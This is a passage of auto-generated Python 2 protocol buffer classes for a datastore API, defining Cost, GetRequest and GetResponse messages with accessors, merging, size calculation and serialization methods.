    self.requested_entity_puts_ = x

  def clear_requested_entity_puts(self):
    if self.has_requested_entity_puts_:
      self.has_requested_entity_puts_ = 0
      self.requested_entity_puts_ = 0

  def has_requested_entity_puts(self): return self.has_requested_entity_puts_

  def requested_entity_deletes(self): return self.requested_entity_deletes_

  def set_requested_entity_deletes(self, x):
    self.has_requested_entity_deletes_ = 1
    self.requested_entity_deletes_ = x

  def clear_requested_entity_deletes(self):
    if self.has_requested_entity_deletes_:
      self.has_requested_entity_deletes_ = 0
      self.requested_entity_deletes_ = 0

  def has_requested_entity_deletes(self): return self.has_requested_entity_deletes_


  def MergeFrom(self, x):
    assert x is not self
    if (x.has_requested_entity_puts()): self.set_requested_entity_puts(x.requested_entity_puts())
    if (x.has_requested_entity_deletes()): self.set_requested_entity_deletes(x.requested_entity_deletes())

  def Equals(self, x):
    if x is self: return 1
    if self.has_requested_entity_puts_ != x.has_requested_entity_puts_: return 0
    if self.has_requested_entity_puts_ and self.requested_entity_puts_ != x.requested_entity_puts_: return 0
    if self.has_requested_entity_deletes_ != x.has_requested_entity_deletes_: return 0
    if self.has_requested_entity_deletes_ and self.requested_entity_deletes_ != x.requested_entity_deletes_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    initialized = 1
    return initialized

  def ByteSize(self):
    n = 0
    if (self.has_requested_entity_puts_): n += 1 + self.lengthVarInt64(self.requested_entity_puts_)
    if (self.has_requested_entity_deletes_): n += 1 + self.lengthVarInt64(self.requested_entity_deletes_)
    return n

  def ByteSizePartial(self):
    n = 0
    if (self.has_requested_entity_puts_): n += 1 + self.lengthVarInt64(self.requested_entity_puts_)
    if (self.has_requested_entity_deletes_): n += 1 + self.lengthVarInt64(self.requested_entity_deletes_)
    return n

  def Clear(self):
    self.clear_requested_entity_puts()
    self.clear_requested_entity_deletes()

  def OutputUnchecked(self, out):
    if (self.has_requested_entity_puts_):
      out.putVarInt32(48)
      out.putVarInt32(self.requested_entity_puts_)
    if (self.has_requested_entity_deletes_):
      out.putVarInt32(56)
      out.putVarInt32(self.requested_entity_deletes_)

  def OutputPartial(self, out):
    if (self.has_requested_entity_puts_):
      out.putVarInt32(48)
      out.putVarInt32(self.requested_entity_puts_)
    if (self.has_requested_entity_deletes_):
      out.putVarInt32(56)
      out.putVarInt32(self.requested_entity_deletes_)

  def TryMerge(self, d):
    while 1:
      tt = d.getVarInt32()
      if tt == 44: break
      if tt == 48:
        self.set_requested_entity_puts(d.getVarInt32())
        continue
      if tt == 56:
        self.set_requested_entity_deletes(d.getVarInt32())
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_requested_entity_puts_: res+=prefix+("requested_entity_puts: %s\n" % self.DebugFormatInt32(self.requested_entity_puts_))
    if self.has_requested_entity_deletes_: res+=prefix+("requested_entity_deletes: %s\n" % self.DebugFormatInt32(self.requested_entity_deletes_))
    return res

class Cost(ProtocolBuffer.ProtocolMessage):
  has_index_writes_ = 0
  index_writes_ = 0
  has_index_write_bytes_ = 0
  index_write_bytes_ = 0
  has_entity_writes_ = 0
  entity_writes_ = 0
  has_entity_write_bytes_ = 0
  entity_write_bytes_ = 0
  has_commitcost_ = 0
  commitcost_ = None
  has_approximate_storage_delta_ = 0
  approximate_storage_delta_ = 0
  has_id_sequence_updates_ = 0
  id_sequence_updates_ = 0

  def __init__(self, contents=None):
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def index_writes(self): return self.index_writes_

  def set_index_writes(self, x):
    self.has_index_writes_ = 1
    self.index_writes_ = x

  def clear_index_writes(self):
    if self.has_index_writes_:
      self.has_index_writes_ = 0
      self.index_writes_ = 0

  def has_index_writes(self): return self.has_index_writes_

  def index_write_bytes(self): return self.index_write_bytes_

  def set_index_write_bytes(self, x):
    self.has_index_write_bytes_ = 1
    self.index_write_bytes_ = x

  def clear_index_write_bytes(self):
    if self.has_index_write_bytes_:
      self.has_index_write_bytes_ = 0
      self.index_write_bytes_ = 0

  def has_index_write_bytes(self): return self.has_index_write_bytes_

  def entity_writes(self): return self.entity_writes_

  def set_entity_writes(self, x):
    self.has_entity_writes_ = 1
    self.entity_writes_ = x

  def clear_entity_writes(self):
    if self.has_entity_writes_:
      self.has_entity_writes_ = 0
      self.entity_writes_ = 0

  def has_entity_writes(self): return self.has_entity_writes_

  def entity_write_bytes(self): return self.entity_write_bytes_

  def set_entity_write_bytes(self, x):
    self.has_entity_write_bytes_ = 1
    self.entity_write_bytes_ = x

  def clear_entity_write_bytes(self):
    if self.has_entity_write_bytes_:
      self.has_entity_write_bytes_ = 0
      self.entity_write_bytes_ = 0

  def has_entity_write_bytes(self): return self.has_entity_write_bytes_

  def commitcost(self):
    if self.commitcost_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.commitcost_ is None: self.commitcost_ = Cost_CommitCost()
      finally:
        self.lazy_init_lock_.release()
    return self.commitcost_

  def mutable_commitcost(self): self.has_commitcost_ = 1; return self.commitcost()

  def clear_commitcost(self):

    if self.has_commitcost_:
      self.has_commitcost_ = 0;
      if self.commitcost_ is not None: self.commitcost_.Clear()

  def has_commitcost(self): return self.has_commitcost_

  def approximate_storage_delta(self): return self.approximate_storage_delta_

  def set_approximate_storage_delta(self, x):
    self.has_approximate_storage_delta_ = 1
    self.approximate_storage_delta_ = x

  def clear_approximate_storage_delta(self):
    if self.has_approximate_storage_delta_:
      self.has_approximate_storage_delta_ = 0
      self.approximate_storage_delta_ = 0

  def has_approximate_storage_delta(self): return self.has_approximate_storage_delta_

  def id_sequence_updates(self): return self.id_sequence_updates_

  def set_id_sequence_updates(self, x):
    self.has_id_sequence_updates_ = 1
    self.id_sequence_updates_ = x

  def clear_id_sequence_updates(self):
    if self.has_id_sequence_updates_:
      self.has_id_sequence_updates_ = 0
      self.id_sequence_updates_ = 0

  def has_id_sequence_updates(self): return self.has_id_sequence_updates_


  def MergeFrom(self, x):
    assert x is not self
    if (x.has_index_writes()): self.set_index_writes(x.index_writes())
    if (x.has_index_write_bytes()): self.set_index_write_bytes(x.index_write_bytes())
    if (x.has_entity_writes()): self.set_entity_writes(x.entity_writes())
    if (x.has_entity_write_bytes()): self.set_entity_write_bytes(x.entity_write_bytes())
    if (x.has_commitcost()): self.mutable_commitcost().MergeFrom(x.commitcost())
    if (x.has_approximate_storage_delta()): self.set_approximate_storage_delta(x.approximate_storage_delta())
    if (x.has_id_sequence_updates()): self.set_id_sequence_updates(x.id_sequence_updates())

  def Equals(self, x):
    if x is self: return 1
    if self.has_index_writes_ != x.has_index_writes_: return 0
    if self.has_index_writes_ and self.index_writes_ != x.index_writes_: return 0
    if self.has_index_write_bytes_ != x.has_index_write_bytes_: return 0
    if self.has_index_write_bytes_ and self.index_write_bytes_ != x.index_write_bytes_: return 0
    if self.has_entity_writes_ != x.has_entity_writes_: return 0
    if self.has_entity_writes_ and self.entity_writes_ != x.entity_writes_: return 0
    if self.has_entity_write_bytes_ != x.has_entity_write_bytes_: return 0
    if self.has_entity_write_bytes_ and self.entity_write_bytes_ != x.entity_write_bytes_: return 0
    if self.has_commitcost_ != x.has_commitcost_: return 0
    if self.has_commitcost_ and self.commitcost_ != x.commitcost_: return 0
    if self.has_approximate_storage_delta_ != x.has_approximate_storage_delta_: return 0
    if self.has_approximate_storage_delta_ and self.approximate_storage_delta_ != x.approximate_storage_delta_: return 0
    if self.has_id_sequence_updates_ != x.has_id_sequence_updates_: return 0
    if self.has_id_sequence_updates_ and self.id_sequence_updates_ != x.id_sequence_updates_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    initialized = 1
    if (self.has_commitcost_ and not self.commitcost_.IsInitialized(debug_strs)): initialized = 0
    return initialized

  def ByteSize(self):
    n = 0
    if (self.has_index_writes_): n += 1 + self.lengthVarInt64(self.index_writes_)
    if (self.has_index_write_bytes_): n += 1 + self.lengthVarInt64(self.index_write_bytes_)
    if (self.has_entity_writes_): n += 1 + self.lengthVarInt64(self.entity_writes_)
    if (self.has_entity_write_bytes_): n += 1 + self.lengthVarInt64(self.entity_write_bytes_)
    if (self.has_commitcost_): n += 2 + self.commitcost_.ByteSize()
    if (self.has_approximate_storage_delta_): n += 1 + self.lengthVarInt64(self.approximate_storage_delta_)
    if (self.has_id_sequence_updates_): n += 1 + self.lengthVarInt64(self.id_sequence_updates_)
    return n

  def ByteSizePartial(self):
    n = 0
    if (self.has_index_writes_): n += 1 + self.lengthVarInt64(self.index_writes_)
    if (self.has_index_write_bytes_): n += 1 + self.lengthVarInt64(self.index_write_bytes_)
    if (self.has_entity_writes_): n += 1 + self.lengthVarInt64(self.entity_writes_)
    if (self.has_entity_write_bytes_): n += 1 + self.lengthVarInt64(self.entity_write_bytes_)
    if (self.has_commitcost_): n += 2 + self.commitcost_.ByteSizePartial()
    if (self.has_approximate_storage_delta_): n += 1 + self.lengthVarInt64(self.approximate_storage_delta_)
    if (self.has_id_sequence_updates_): n += 1 + self.lengthVarInt64(self.id_sequence_updates_)
    return n

  def Clear(self):
    self.clear_index_writes()
    self.clear_index_write_bytes()
    self.clear_entity_writes()
    self.clear_entity_write_bytes()
    self.clear_commitcost()
    self.clear_approximate_storage_delta()
    self.clear_id_sequence_updates()

  def OutputUnchecked(self, out):
    if (self.has_index_writes_):
      out.putVarInt32(8)
      out.putVarInt32(self.index_writes_)
    if (self.has_index_write_bytes_):
      out.putVarInt32(16)
      out.putVarInt32(self.index_write_bytes_)
    if (self.has_entity_writes_):
      out.putVarInt32(24)
      out.putVarInt32(self.entity_writes_)
    if (self.has_entity_write_bytes_):
      out.putVarInt32(32)
      out.putVarInt32(self.entity_write_bytes_)
    if (self.has_commitcost_):
      out.putVarInt32(43)
      self.commitcost_.OutputUnchecked(out)
      out.putVarInt32(44)
    if (self.has_approximate_storage_delta_):
      out.putVarInt32(64)
      out.putVarInt32(self.approximate_storage_delta_)
    if (self.has_id_sequence_updates_):
      out.putVarInt32(72)
      out.putVarInt32(self.id_sequence_updates_)

  def OutputPartial(self, out):
    if (self.has_index_writes_):
      out.putVarInt32(8)
      out.putVarInt32(self.index_writes_)
    if (self.has_index_write_bytes_):
      out.putVarInt32(16)
      out.putVarInt32(self.index_write_bytes_)
    if (self.has_entity_writes_):
      out.putVarInt32(24)
      out.putVarInt32(self.entity_writes_)
    if (self.has_entity_write_bytes_):
      out.putVarInt32(32)
      out.putVarInt32(self.entity_write_bytes_)
    if (self.has_commitcost_):
      out.putVarInt32(43)
      self.commitcost_.OutputPartial(out)
      out.putVarInt32(44)
    if (self.has_approximate_storage_delta_):
      out.putVarInt32(64)
      out.putVarInt32(self.approximate_storage_delta_)
    if (self.has_id_sequence_updates_):
      out.putVarInt32(72)
      out.putVarInt32(self.id_sequence_updates_)

  def TryMerge(self, d):
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 8:
        self.set_index_writes(d.getVarInt32())
        continue
      if tt == 16:
        self.set_index_write_bytes(d.getVarInt32())
        continue
      if tt == 24:
        self.set_entity_writes(d.getVarInt32())
        continue
      if tt == 32:
        self.set_entity_write_bytes(d.getVarInt32())
        continue
      if tt == 43:
        self.mutable_commitcost().TryMerge(d)
        continue
      if tt == 64:
        self.set_approximate_storage_delta(d.getVarInt32())
        continue
      if tt == 72:
        self.set_id_sequence_updates(d.getVarInt32())
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_index_writes_: res+=prefix+("index_writes: %s\n" % self.DebugFormatInt32(self.index_writes_))
    if self.has_index_write_bytes_: res+=prefix+("index_write_bytes: %s\n" % self.DebugFormatInt32(self.index_write_bytes_))
    if self.has_entity_writes_: res+=prefix+("entity_writes: %s\n" % self.DebugFormatInt32(self.entity_writes_))
    if self.has_entity_write_bytes_: res+=prefix+("entity_write_bytes: %s\n" % self.DebugFormatInt32(self.entity_write_bytes_))
    if self.has_commitcost_:
      res+=prefix+"CommitCost {\n"
      res+=self.commitcost_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+"}\n"
    if self.has_approximate_storage_delta_: res+=prefix+("approximate_storage_delta: %s\n" % self.DebugFormatInt32(self.approximate_storage_delta_))
    if self.has_id_sequence_updates_: res+=prefix+("id_sequence_updates: %s\n" % self.DebugFormatInt32(self.id_sequence_updates_))
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  kindex_writes = 1
  kindex_write_bytes = 2
  kentity_writes = 3
  kentity_write_bytes = 4
  kCommitCostGroup = 5
  kCommitCostrequested_entity_puts = 6
  kCommitCostrequested_entity_deletes = 7
  kapproximate_storage_delta = 8
  kid_sequence_updates = 9

  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "index_writes",
    2: "index_write_bytes",
    3: "entity_writes",
    4: "entity_write_bytes",
    5: "CommitCost",
    6: "requested_entity_puts",
    7: "requested_entity_deletes",
    8: "approximate_storage_delta",
    9: "id_sequence_updates",
  }, 9)

  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.NUMERIC,
    2: ProtocolBuffer.Encoder.NUMERIC,
    3: ProtocolBuffer.Encoder.NUMERIC,
    4: ProtocolBuffer.Encoder.NUMERIC,
    5: ProtocolBuffer.Encoder.STARTGROUP,
    6: ProtocolBuffer.Encoder.NUMERIC,
    7: ProtocolBuffer.Encoder.NUMERIC,
    8: ProtocolBuffer.Encoder.NUMERIC,
    9: ProtocolBuffer.Encoder.NUMERIC,
  }, 9, ProtocolBuffer.Encoder.MAX_TYPE)


  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.Cost'
class GetRequest(ProtocolBuffer.ProtocolMessage):
  has_header_ = 0
  header_ = None
  has_transaction_ = 0
  transaction_ = None
  has_failover_ms_ = 0
  failover_ms_ = 0
  has_strong_ = 0
  strong_ = 0
  has_allow_deferred_ = 0
  allow_deferred_ = 0

  def __init__(self, contents=None):
    self.key_ = []
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def header(self):
    if self.header_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.header_ is None: self.header_ = InternalHeader()
      finally:
        self.lazy_init_lock_.release()
    return self.header_

  def mutable_header(self): self.has_header_ = 1; return self.header()

  def clear_header(self):

    if self.has_header_:
      self.has_header_ = 0;
      if self.header_ is not None: self.header_.Clear()

  def has_header(self): return self.has_header_

  def key_size(self): return len(self.key_)
  def key_list(self): return self.key_

  def key(self, i):
    return self.key_[i]

  def mutable_key(self, i):
    return self.key_[i]

  def add_key(self):
    x = Reference()
    self.key_.append(x)
    return x

  def clear_key(self):
    self.key_ = []
  def transaction(self):
    if self.transaction_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.transaction_ is None: self.transaction_ = Transaction()
      finally:
        self.lazy_init_lock_.release()
    return self.transaction_

  def mutable_transaction(self): self.has_transaction_ = 1; return self.transaction()

  def clear_transaction(self):

    if self.has_transaction_:
      self.has_transaction_ = 0;
      if self.transaction_ is not None: self.transaction_.Clear()

  def has_transaction(self): return self.has_transaction_

  def failover_ms(self): return self.failover_ms_

  def set_failover_ms(self, x):
    self.has_failover_ms_ = 1
    self.failover_ms_ = x

  def clear_failover_ms(self):
    if self.has_failover_ms_:
      self.has_failover_ms_ = 0
      self.failover_ms_ = 0

  def has_failover_ms(self): return self.has_failover_ms_

  def strong(self): return self.strong_

  def set_strong(self, x):
    self.has_strong_ = 1
    self.strong_ = x

  def clear_strong(self):
    if self.has_strong_:
      self.has_strong_ = 0
      self.strong_ = 0

  def has_strong(self): return self.has_strong_

  def allow_deferred(self): return self.allow_deferred_

  def set_allow_deferred(self, x):
    self.has_allow_deferred_ = 1
    self.allow_deferred_ = x

  def clear_allow_deferred(self):
    if self.has_allow_deferred_:
      self.has_allow_deferred_ = 0
      self.allow_deferred_ = 0

  def has_allow_deferred(self): return self.has_allow_deferred_


  def MergeFrom(self, x):
    assert x is not self
    if (x.has_header()): self.mutable_header().MergeFrom(x.header())
    for i in xrange(x.key_size()): self.add_key().CopyFrom(x.key(i))
    if (x.has_transaction()): self.mutable_transaction().MergeFrom(x.transaction())
    if (x.has_failover_ms()): self.set_failover_ms(x.failover_ms())
    if (x.has_strong()): self.set_strong(x.strong())
    if (x.has_allow_deferred()): self.set_allow_deferred(x.allow_deferred())

  def Equals(self, x):
    if x is self: return 1
    if self.has_header_ != x.has_header_: return 0
    if self.has_header_ and self.header_ != x.header_: return 0
    if len(self.key_) != len(x.key_): return 0
    for e1, e2 in zip(self.key_, x.key_):
      if e1 != e2: return 0
    if self.has_transaction_ != x.has_transaction_: return 0
    if self.has_transaction_ and self.transaction_ != x.transaction_: return 0
    if self.has_failover_ms_ != x.has_failover_ms_: return 0
    if self.has_failover_ms_ and self.failover_ms_ != x.failover_ms_: return 0
    if self.has_strong_ != x.has_strong_: return 0
    if self.has_strong_ and self.strong_ != x.strong_: return 0
    if self.has_allow_deferred_ != x.has_allow_deferred_: return 0
    if self.has_allow_deferred_ and self.allow_deferred_ != x.allow_deferred_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    initialized = 1
    if (self.has_header_ and not self.header_.IsInitialized(debug_strs)): initialized = 0
    for p in self.key_:
      if not p.IsInitialized(debug_strs): initialized=0
    if (self.has_transaction_ and not self.transaction_.IsInitialized(debug_strs)): initialized = 0
    return initialized

  def ByteSize(self):
    n = 0
    if (self.has_header_): n += 1 + self.lengthString(self.header_.ByteSize())
    n += 1 * len(self.key_)
    for i in xrange(len(self.key_)): n += self.lengthString(self.key_[i].ByteSize())
    if (self.has_transaction_): n += 1 + self.lengthString(self.transaction_.ByteSize())
    if (self.has_failover_ms_): n += 1 + self.lengthVarInt64(self.failover_ms_)
    if (self.has_strong_): n += 2
    if (self.has_allow_deferred_): n += 2
    return n

  def ByteSizePartial(self):
    n = 0
    if (self.has_header_): n += 1 + self.lengthString(self.header_.ByteSizePartial())
    n += 1 * len(self.key_)
    for i in xrange(len(self.key_)): n += self.lengthString(self.key_[i].ByteSizePartial())
    if (self.has_transaction_): n += 1 + self.lengthString(self.transaction_.ByteSizePartial())
    if (self.has_failover_ms_): n += 1 + self.lengthVarInt64(self.failover_ms_)
    if (self.has_strong_): n += 2
    if (self.has_allow_deferred_): n += 2
    return n

  def Clear(self):
    self.clear_header()
    self.clear_key()
    self.clear_transaction()
    self.clear_failover_ms()
    self.clear_strong()
    self.clear_allow_deferred()

  def OutputUnchecked(self, out):
    for i in xrange(len(self.key_)):
      out.putVarInt32(10)
      out.putVarInt32(self.key_[i].ByteSize())
      self.key_[i].OutputUnchecked(out)
    if (self.has_transaction_):
      out.putVarInt32(18)
      out.putVarInt32(self.transaction_.ByteSize())
      self.transaction_.OutputUnchecked(out)
    if (self.has_failover_ms_):
      out.putVarInt32(24)
      out.putVarInt64(self.failover_ms_)
    if (self.has_strong_):
      out.putVarInt32(32)
      out.putBoolean(self.strong_)
    if (self.has_allow_deferred_):
      out.putVarInt32(40)
      out.putBoolean(self.allow_deferred_)
    if (self.has_header_):
      out.putVarInt32(50)
      out.putVarInt32(self.header_.ByteSize())
      self.header_.OutputUnchecked(out)

  def OutputPartial(self, out):
    for i in xrange(len(self.key_)):
      out.putVarInt32(10)
      out.putVarInt32(self.key_[i].ByteSizePartial())
      self.key_[i].OutputPartial(out)
    if (self.has_transaction_):
      out.putVarInt32(18)
      out.putVarInt32(self.transaction_.ByteSizePartial())
      self.transaction_.OutputPartial(out)
    if (self.has_failover_ms_):
      out.putVarInt32(24)
      out.putVarInt64(self.failover_ms_)
    if (self.has_strong_):
      out.putVarInt32(32)
      out.putBoolean(self.strong_)
    if (self.has_allow_deferred_):
      out.putVarInt32(40)
      out.putBoolean(self.allow_deferred_)
    if (self.has_header_):
      out.putVarInt32(50)
      out.putVarInt32(self.header_.ByteSizePartial())
      self.header_.OutputPartial(out)

  def TryMerge(self, d):
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_key().TryMerge(tmp)
        continue
      if tt == 18:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_transaction().TryMerge(tmp)
        continue
      if tt == 24:
        self.set_failover_ms(d.getVarInt64())
        continue
      if tt == 32:
        self.set_strong(d.getBoolean())
        continue
      if tt == 40:
        self.set_allow_deferred(d.getBoolean())
        continue
      if tt == 50:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_header().TryMerge(tmp)
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_header_:
      res+=prefix+"header <\n"
      res+=self.header_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    cnt=0
    for e in self.key_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("key%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    if self.has_transaction_:
      res+=prefix+"transaction <\n"
      res+=self.transaction_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    if self.has_failover_ms_: res+=prefix+("failover_ms: %s\n" % self.DebugFormatInt64(self.failover_ms_))
    if self.has_strong_: res+=prefix+("strong: %s\n" % self.DebugFormatBool(self.strong_))
    if self.has_allow_deferred_: res+=prefix+("allow_deferred: %s\n" % self.DebugFormatBool(self.allow_deferred_))
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  kheader = 6
  kkey = 1
  ktransaction = 2
  kfailover_ms = 3
  kstrong = 4
  kallow_deferred = 5

  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "key",
    2: "transaction",
    3: "failover_ms",
    4: "strong",
    5: "allow_deferred",
    6: "header",
  }, 6)

  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
    2: ProtocolBuffer.Encoder.STRING,
    3: ProtocolBuffer.Encoder.NUMERIC,
    4: ProtocolBuffer.Encoder.NUMERIC,
    5: ProtocolBuffer.Encoder.NUMERIC,
    6: ProtocolBuffer.Encoder.STRING,
  }, 6, ProtocolBuffer.Encoder.MAX_TYPE)


  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.GetRequest'
class GetResponse_Entity(ProtocolBuffer.ProtocolMessage):
  has_entity_ = 0
  entity_ = None
  has_key_ = 0
  key_ = None
  has_version_ = 0
  version_ = 0

  def __init__(self, contents=None):
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def entity(self):
    if self.entity_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.entity_ is None: self.entity_ = EntityProto()
      finally:
        self.lazy_init_lock_.release()
    return self.entity_

  def mutable_entity(self): self.has_entity_ = 1; return self.entity()

  def clear_entity(self):

    if self.has_entity_:
      self.has_entity_ = 0;
      if self.entity_ is not None: self.entity_.Clear()

  def has_entity(self): return self.has_entity_

  def key(self):
    if self.key_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.key_ is None: self.key_ = Reference()
      finally:
        self.lazy_init_lock_.release()
    return self.key_

  def mutable_key(self): self.has_key_ = 1; return self.key()

  def clear_key(self):

    if self.has_key_:
      self.has_key_ = 0;
      if self.key_ is not None: self.key_.Clear()

  def has_key(self): return self.has_key_

  def version(self): return self.version_

  def set_version(self, x):
    self.has_version_ = 1
    self.version_ = x

  def clear_version(self):
    if self.has_version_:
      self.has_version_ = 0
      self.version_ = 0

  def has_version(self): return self.has_version_


  def MergeFrom(self, x):
    assert x is not self
    if (x.has_entity()): self.mutable_entity().MergeFrom(x.entity())
    if (x.has_key()): self.mutable_key().MergeFrom(x.key())
    if (x.has_version()): self.set_version(x.version())

  def Equals(self, x):
    if x is self: return 1
    if self.has_entity_ != x.has_entity_: return 0
    if self.has_entity_ and self.entity_ != x.entity_: return 0
    if self.has_key_ != x.has_key_: return 0
    if self.has_key_ and self.key_ != x.key_: return 0
    if self.has_version_ != x.has_version_: return 0
    if self.has_version_ and self.version_ != x.version_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    initialized = 1
    if (self.has_entity_ and not self.entity_.IsInitialized(debug_strs)): initialized = 0
    if (self.has_key_ and not self.key_.IsInitialized(debug_strs)): initialized = 0
    return initialized

  def ByteSize(self):
    n = 0
    if (self.has_entity_): n += 1 + self.lengthString(self.entity_.ByteSize())
    if (self.has_key_): n += 1 + self.lengthString(self.key_.ByteSize())
    if (self.has_version_): n += 1 + self.lengthVarInt64(self.version_)
    return n

  def ByteSizePartial(self):
    n = 0
    if (self.has_entity_): n += 1 + self.lengthString(self.entity_.ByteSizePartial())
    if (self.has_key_): n += 1 + self.lengthString(self.key_.ByteSizePartial())
    if (self.has_version_): n += 1 + self.lengthVarInt64(self.version_)
    return n

  def Clear(self):
    self.clear_entity()
    self.clear_key()
    self.clear_version()

  def OutputUnchecked(self, out):
    if (self.has_entity_):
      out.putVarInt32(18)
      out.putVarInt32(self.entity_.ByteSize())
      self.entity_.OutputUnchecked(out)
    if (self.has_version_):
      out.putVarInt32(24)
      out.putVarInt64(self.version_)
    if (self.has_key_):
      out.putVarInt32(34)
      out.putVarInt32(self.key_.ByteSize())
      self.key_.OutputUnchecked(out)

  def OutputPartial(self, out):
    if (self.has_entity_):
      out.putVarInt32(18)
      out.putVarInt32(self.entity_.ByteSizePartial())
      self.entity_.OutputPartial(out)
    if (self.has_version_):
      out.putVarInt32(24)
      out.putVarInt64(self.version_)
    if (self.has_key_):
      out.putVarInt32(34)
      out.putVarInt32(self.key_.ByteSizePartial())
      self.key_.OutputPartial(out)

  def TryMerge(self, d):
    while 1:
      tt = d.getVarInt32()
      if tt == 12: break
      if tt == 18:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_entity().TryMerge(tmp)
        continue
      if tt == 24:
        self.set_version(d.getVarInt64())
        continue
      if tt == 34:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_key().TryMerge(tmp)
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_entity_:
      res+=prefix+"entity <\n"
      res+=self.entity_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    if self.has_key_:
      res+=prefix+"key <\n"
      res+=self.key_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    if self.has_version_: res+=prefix+("version: %s\n" % self.DebugFormatInt64(self.version_))
    return res

class GetResponse(ProtocolBuffer.ProtocolMessage):
  has_in_order_ = 0
  in_order_ = 1

  def __init__(self, contents=None):
    self.entity_ = []
    self.deferred_ = []
    if contents is not None: self.MergeFromString(contents)

  def entity_size(self): return len(self.entity_)
  def entity_list(self): return self.entity_

  def entity(self, i):
    return self.entity_[i]

  def mutable_entity(self, i):
    return self.entity_[i]

  def add_entity(self):
    x = GetResponse_Entity()
    self.entity_.append(x)
    return x

  def clear_entity(self):
    self.entity_ = []
  def deferred_size(self): return len(self.deferred_)
  def deferred_list(self): return self.deferred_

  def deferred(self, i):
    return self.deferred_[i]

  def mutable_deferred(self, i):
    return self.deferred_[i]

  def add_deferred(self):
    x = Reference()
    self.deferred_.append(x)
    return x

  def clear_deferred(self):
    self.deferred_ = []
  def in_order(self): return self.in_order_

  def set_in_order(self, x):
    self.has_in_order_ = 1
    self.in_order_ = x

  def clear_in_order(self):
    if self.has_in_order_:
      self.has_in_order_ = 0
      self.in_order_ = 1

  def has_in_order(self): return self.has_in_order_


  def MergeFrom(self, x):
    assert x is not self
    for i in xrange(x.entity_size()): self.add_entity().CopyFrom(x.entity(i))
    for i in xrange(x.deferred_size()): self.add_deferred().CopyFrom(x.deferred(i))
    if (x.has_in_order()): self.set_in_order(x.in_order())

  def Equals(self, x):
    if x is self: return 1
    if len(self.entity_) != len(x.entity_): return 0
    for e1, e2 in zip(self.entity_, x.entity_):
      if e1 != e2: return 0
    if len(self.deferred_) != len(x.deferred_): return 0
    for e1, e2 in zip(self.deferred_, x.deferred_):
      if e1 != e2: return 0
    if self.has_in_order_ != x.has_in_order_: return 0
    if self.has_in_order_ and self.in_order_ != x.in_order_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    initialized = 1
    for p in self.entity_:
      if not p.IsInitialized(debug_strs): initialized=0
    for p in self.deferred_:
      if not p.IsInitialized(debug_strs): initialized=0
    return initialized

  def ByteSize(self):
    n = 0
    n += 2 * len(self.entity_)
    for i in xrange(len(self.entity_)): n += self.entity_[i].ByteSize()
    n += 1 * len(self.deferred_)
    for i in xrange(len(self.deferred_)): n += self.lengthString(self.deferred_[i].ByteSize())
    if (self.has_in_order_): n += 2
    return n

  def ByteSizePartial(self):
    n = 0
    n += 2 * len(self.entity_)
    for i in xrange(len(self.entity_)): n += self.entity_[i].ByteSizePartial()
